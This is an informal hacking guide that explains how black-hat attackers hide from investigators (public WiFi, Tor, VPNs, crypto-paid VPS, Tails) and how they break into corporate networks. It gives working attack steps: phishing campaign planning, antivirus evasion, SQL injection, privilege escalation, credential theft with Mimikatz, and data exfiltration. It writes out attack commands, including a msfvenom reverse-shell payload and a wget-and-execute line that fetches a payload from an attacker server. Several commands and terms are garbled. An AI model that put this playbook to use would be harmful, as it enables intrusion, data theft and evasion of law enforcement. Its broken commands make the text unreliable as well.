Hacking Guide and information

Black hat hackers now more than ever focus on to stay safe during hacking.
It means they need to cover their tracks at all given times to avoid
getting tracked down.

--Blank Slate Hacking
Often they start with a new computer new hotspot new IP address new servers
for each hack.

The investigators will typically look for patterns between hacks.
Such as did we see this IP address in another hack which browser was used?
Which Gmail/Yahoo/Facebook/Microsoft account was used.
Hackers know that law enforcement agencies are not working alone conduction
investigation. They have full access to local ISP records, social media sites,
black ops projects between governments in UK, USA, France, Canada.
Many of the exposure came out of the Snowden leaks.

Being Anonymous - Network Anonymity

Hackers know never to use their home/work/university IP address not even with multiple layers
of anonymity. If somehow a system glitch occur it could reveal the real IP address.
Just a small leak is all it takes for the hacker to be caught by the law enforcement agent.
Once they get the hacker they can pressure them to confess.

First Level - Blend in - Hide in plain site

Hackers often use public WiFi hotspots that could be at fast food places like (McDonalds Starbucks, Burger King),places with large public gatherings such as malls, train stations.
They want to be sure they are hidden from possible cameras.
When accessing WiFi hotspots it will ask for name but they just put in bogus information.
Another popular way is to use a prepaid SIM card which was paid in cash.
If it requires email verification they use just anonymous mail sites like yopmail.com to create temporary mailboxes for validation links.

--Second Level
Now the hackers need to smuggle their data safely to avoid detection.
A favourite way is to the use the TOR open source network.
It consists of a  network of servers that exchange encrypted traffic data.
An example is if you are Germany and connect to the TOR network it will encrypt your data serveral times and exit out from a server in Russia, China, Brazil or another place before reaching the target.
This can make the hackers almost completely anonymous since the target site can not
see the original IP address of the hacker from the exit node.
And because many people use the same exit node it is very difficult for investigators to track
or get any patterns.
Now TOR is not bullet proof since a way to compromise a TOR user is example a malicious website
that injects code in the TOR web browser installs a malware that is leaking normal requests revealing the source IP address rendering the hacker vulnerable.
Hackers are aware of this and will be very cautions when using the TOR often from public places.
It is a favorite way for Government investigators to track TOR users via malicious Malware that infects the TOR browser.

Further more there are rumours that federal agencies control a good amount of nodes on the TOR network and can track down TOR traffic back to the source IP address and identify TOR users.

Other popular ways is using an anonymous VPN provider paid with Crypto currency.
a VPN is an encrypted connection between 2 machines that gives the hacker a way to hide their IP address.
The ISP Internet Service Provide will not be able to know or spy on the traffic sent over VPN due to
the encryption used.
It is also useful using VPN to avoid filters, censoring.
If the VPN server is hosted in a country neutral to law enforcement example https://www.privacytools.io can show multiple vendors for reference.

-- Third Level
To sum up a paranoid hacker would use a public space with public anonymous hotspot, go via TOR or a VPN server.
In practical scenario this will cause a lot of bandwidth slowness for the hacker.
It can make connections simple to slow because all the extra hubs for anonymity.
To have a more secure connection but also with high bandwidth hackers will utilize VPS Virtual Private Server.
The VPS server called a Front Gun Server paid in crypto is hard to track.
They will never pay with credit card since it is very easy to track down.
The VPS server can run any OS Operating System this could be a black hat linux distribution such as KALI Linux that is filled with hacking tools. If an investigator ever track down the VPS Front Gun Server and when they seize it and if the hacker only connected via VPN hiding their IP the investigator would have a hard time to catch the hacker.

Even if a VPN provider is forced to hand over information likely it will just be an IP address from a public Hotspot that makes it too time consuming and costly for the investigator to proceed.
The investigation cost will outweigh the damages cost and simple not be worth for the investigator
to continue.

And my using a Front Gun server the hacker will never have any hacking tools on his private PC computer.
So even if he gets tracked down or seized without any tools on his computer and it will be hard to
ever prove any hacking activity.

They can even run a read only operating system such as Tails or Whonix that boots from a USB stick and
remove all traces on reboot.

In the end what makes hackers being catched is when they get lazy or too confident and taking short cuts avoiding key security steps.

-- How do Hackers break in?
What do hackers want to get?

  • a: CEOs emails
  • b: steal and sell business secrets or data
  • c: Credit card information comploye information
  • d: They want to fly under the radar

When a hacker breaks in they will see the target company network.
A Firewall a DMZ zone(Blue box) and the internal network(Green box).

How do major hacks and penetrations occur?
Most popular ways includes:
a: Phishing, example of the Clinton mail hack. Where a specially crafted email was sent tricking the user to reveal the password.
In this specific case the non technical person already had asked tech department if the mail was safe. They said it was safe and then it was clicked.
By this the phiser had success in fooling both the technical and non technical personnel.
Typically when attackers deploy Phishing attacks they target 100 of unsuspecting users in an organisation.
This gives them statistical advantage for break in. It is common to achieve as high as 30% success rate if the campaign is professionally made.
When the attacker wants to perform a Phishing campaign they need to obtain organisation information.
This includes:
- List of employees and their emails
- A good believeable theme in the mail to make the user click. Could be a new Windows or Adobe Reader update.
- A professional black market platform to sent the mail from that can circumvent anti spam & anti virus appliances

Before attackers deploy a successful Phishing campaign they will research topics about the company.
Such as:
CV of employees
Shareholder survey results
Public press releases
General information about the company
Harvesting software to find company personnel email addresses.

The topics being used in the Phishing mails can be:
Important Security updates
CEO mail
Urgent due invoice
Bloomberg report
Negative review about the company
Social media mention about the company
Pretending being a new employee sending a malware infected CV.


Attackers will perfect the Phishing mail to make it look trustworthy and just have a link for the victim to click on.

They register a domain to make the link looking close to the target name they are trying to look to be from look trust worthy.

Once the attacker gets you to click the link
They will as an example setup a false listening on port 443.
Launch a malicious VBA payload.
That generates a reverse shell payload copy pasted in an excel macro.

The attacker can use fully automated advanced tool for the process.

The goal of an attacker can be to get a reverse shell this can allow them to obtain
passwords in clear text.

Attackers are trained to bypass SPH Anti Malware, Anti Virus, Sandbox, IDS, IPS.
Using different techniques example two stagers.

Attackers will often use multiple layers of encryption and obfuscation. Veil-Evasion to bypass Anti Virus software.

Veil-Evasion can generate obfuscated meterpreter shellcode in Powershell that can connect back to the attacker Front Gun server and give full access to the target.

Hackers do see Anti Virus as a problem.
The weakness of Anti Virus is its base on signatures specific data to be flagged. Example flagging a Malware for a specific code in a file.
Attackers can simple make a Malware from scratch that is not based on any signatures.

And Anti Virus only scans on the disk. Downloading a file will be scanned. However some files are directly injected to memory not tricking any alerts as long
as it is not touching the disk.
Attackers use a code called stager to hold malicious code encrypted or encoded . Then injecting the code to an already existing process in the memory.

Attackers will start by doing a reconnaissance to find all mapped dns names to a target site.
This way the attacker might find interesting targets that are otherwise not obvious.
It could be intranet.targetdomain  database.targetdomain  careeer.targetdomain

One of the attackers favourite ways when compromising a web / e-commerce site is to look for directory traversal vulnerabilities.
This can reveal configuration files with username and password credentials inside.
It is also useful for the attacker to find files vulnerable command execution. This can allow for reverse shell to be opened or what ever the
attacker wished.

SQL injection is likewise very important that the attacker can use to easily make the target SQL database execute malicious commands.
The SQL code must be correct in order for results to show.
The attackers often use SQLmap tool for the job.
Microsoft SQL Server provides native functions to execute code via xp_cmdshell.

A tool such as sqlmap can be used to identify the SQL backend version.
Example could be MySQL, PostgreSQL, Azure, Microsoft SQL or Oracle.
Once the attacker know the SQL version they can use this information to base
other attacks on.

A popular trick is to obtain the user list from the SQL database.
When the attacker obtains the hashes they can be cracked off line.
Sometimes the Hashes can be salted (mean a random string is added to the passwords) which makes the cracking slower.

The most common hacks and vulnerabilities are done via web applications.

The Internet is much larger than only what is called web and web applications.

Other services of interest to attackers can be SSH, TELNET, FTP, RDP.

A very effective way for the attacker to find services
is to example utilize a namp port scan
nmap -p- -A iprange/24
This launches nmap with all ports and checking all services on each port.

A popular easy to hack service is on TCP port 27019.
Default port used by MongoDB.

So it is easy for an attack to by going to shodan search engine.

search Product:MongoDB

A popular port that is also looked for is TCP port 3389.
This port can allow remote access to a windows machine with rdesktop.

The goal for attackers is to reach the Greenbox internal network which is behind the Bluebox external network.

SQL Injection on a MS SQL server running the DBA account. Commands executed with xp_commandshell which has highest privileges.

When connected to a Bluebox they need to get elevated permissions in order to clean and stop logging.

To get root they would find a program that executes files with higher privileges.

find / -type f( -perm -04000 -o -perm -02000 ) -exec ls -l {} ;

It could be finding a program that runs a file.
echo -e "#!bin/bashn/bin/bash" >/tmp/install.sh
sudo su

Tools such as linuxprivchecker.py can also assist in the process.

Socks Proxy for opening access to the attacker.
Popular ports for Socks Proxy can be TCP port 5555 TCP port 1521, TCP port 9050.

Rules that can allow the firewall to forward the ports
iptables -t nat -A PREROUTING -s IP -p tcp -i eth1 --dport 80 -j DNAT --targetweb:1521

The Attacker can also use the Metasploit suite.
This way to generate a meterpreter executeable.
msfvenom  reverse_tcp LHOST=IP=443 =f elf >package

Then run the reverse_tcp
set LPORT 443

This way it is more easy to download the file to a third party
wget http://serverip/package
chmod x package && ./package

Java web servers: Tomcat, JBoss, Jenkins.
Admin consoles.
Common ports they run on are 8080, 8443, 8081, 8888.

Vulnerable are JMX-consoole Web-console JmxInvokerServlet

Another trick on Windows platforms is to to run:
powershell -exec bypass
Find interesting files such as

dir /b /s "*.bat"
dir /b /s "*.cmd"
dir /b /s "*.vbs"
dir /b /s "*.vba"
dir /b /s "*.vbe"
dir /b /s "*.ps1"
dir /b /s "*.config"
dir /b /s "*.ini"

Common Windows accounts  are admin_mnt & admin_svc.
Attackers use HTML protocol suite using both hashing and challenge response.

Windows passwords are stored in LM  and NTLM User:LM:NTLM
NTLM hash is a MD4 applied to the Unicode 128 bit long.
It is very fast to brute force.

When a user sits at the keyboard and logins Windows calculates the passwords hash typed by the user and compares with stored value.

Over the network it relies on a challenge response protocol to authenticate users.
The server sends a challenge to the client workstation.
The workstation encrypt it the user password hash and send back to the server.

Sneaky attackers can exploit this to get the hash of the administrator password without knowing it and gain access to multiple units over a network.

Another problem on Windows is that the passwords are stored in the Local Security Authority Subsystem Service LSASS process in memory.
Via undocumented functions in Windows some tools like Mimikatz can decrypt them.

Active Directory is used by Windows machines in a corporate environment linked together to share resources.
The root node in a Windows Active Directory is called a Forest. The purpose is to the contain domains groups of users that share the same configuration.
Each domain can have its own passwords, update schedule, user accounts.
There are two types of users Local users with hashes stored locally on the server. Domain users with hashes stored on the domain controller.

A domain user can then connect to all workstations in the domain.

UAC can circumvent UAC introduced in Windows VISTA which prompts users for a pop-up dialogue box before executing privileged actions.
This is due to the default administrator account is not subject to UAC.

This way they can use to run in memory download invoke-Minikatz to run powershell without storing any files to the disk.

It can use remote PowerShell execution WinRM service TCP port 5985.

Another WMI remote executing tool can also be used.

Attackers are also known to use the Golden ticket Kerberos ticket valid for 10 years to impersonate users.

What do attackers typically go after once gained access?

CEO email
Secret business information
HR files
Strategic files
Marketing strategy
logins to other sites like social media
leaking customer records

Attackers are carefully when retrieving the data to not ticker defences like Data Loss Prevention (DLP) systems.

So often they need to get gigabytes of data out without being discovered.

Example if the attackers take 50-100 Gigabyte out in one attempt it can ticker systems and cause investigation.

To circumvent it they will fragment the data by making multiple zip files and convert them into old text file format.
The most common way to upload the files out is simple transmit it over HTTPS or use more advanced technique to sent it via DNS queries.

Sites such as Pastebin are very popular as well.

Sensitive data can also be available easy to grab for the attacker via Network shares.

To obtain sensitive emails they will look for email.OST located in the Outlook local folder for the user.

The s/MIME is a protocol used to securely exchange emails based on public key infrastructure.
This can be used to encrypt mails even it is very rare.
Several tools can still be used to dump the unencrypted mails from memory.

When obtaining access to remote systems they bypass UAC with bypassuac_eventvwr module.